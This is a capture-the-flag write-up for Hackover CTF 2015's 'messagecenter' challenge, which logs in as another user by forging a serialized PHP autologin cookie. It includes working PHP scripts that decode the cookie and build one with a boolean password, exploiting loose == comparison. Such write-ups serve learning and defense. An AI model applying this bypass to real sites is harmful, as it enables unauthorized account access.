Hackover CTF 2015 – messagecenter

This writeup describes the solution for the messagecenter challenge in Hackover CTF 2015 held by Chaos Computer Club Hamburg.

Hackover CTF 2015 - Messagecenter - Task description

The task was … to find the flag …  as usual :D. So lets look at the website.

Hackover CTF 2015 - Messagecenter - Website

So we get a simple website with login fields and some information (demo login data, more username, etc.). When logging in using the “demo” account and “remember me” option we get this view:

Hackover CTF 2015 - Messagecenter - Login view

Nothing special – you can read and write messages. The website is vulnerable to Cross-Site-Scripting but besides other contestants no admin, alice, bob or other interesting session id can be stolen. So this is not the right way to a flag. Let’s look at the cookie data now.

Hackover CTF 2015 - Messagecenter - Cookie data

There is the php session id (PHPSESSID) and a second one that only exists when using the “remember me” login checkbox. At first it looks like some serialized data. Lets check this using a small php script.

<?php

  $cookie = "a%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22demo%22%3Bs%3A8%3A%22password%22%3Bs%3A40%3A%2289e495e7941cf9e40e6980d14a16bf023ccd4c91%22%3B%7D";

  $data = unserialize(urldecode($cookie));
  var_dump($data);

?>

When executing…

ruport@zentaur:~/hackover2015$ php cookie.php 
array(2) {
  ["username"]=>
  string(4) "demo"
  ["password"]=>
  string(40) "89e495e7941cf9e40e6980d14a16bf023ccd4c91"
}

Alright the username and password are directly encoded in the autologin cookie. Lets think about what the server does with this data. I will unserialize it and check for correct username and password using some database. As we all know php comparison is not type-safe when using simple == instead of ===.

If the server php uses unsafe comparison, changing the password type from string to boolean would allow to login with any username. Lets test this and write a small php script to prepare a cookie.

<?php

  $data = array('username' => "Alice", 'password' => True);

  $cookie = serialize($data);

  print urlencode($cookie);

?>

The output after execution is:

ruport@zentaur:~/hackover2015$ php messagecenter.php 
a%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%22Alice%22%3Bs%3A8%3A%22password%22%3Bb%3A1%3B%7D

After putting this new autologin cookie into the browser and refreshing the website we get a “very important” message in Alice’ inbox:

Hackover CTF 2015 - Messagecenter - Solution

The solution is “hackover15{typeSafetyToTheRescue}“.

Leave a Reply

Your email address will not be published. Required fields are marked *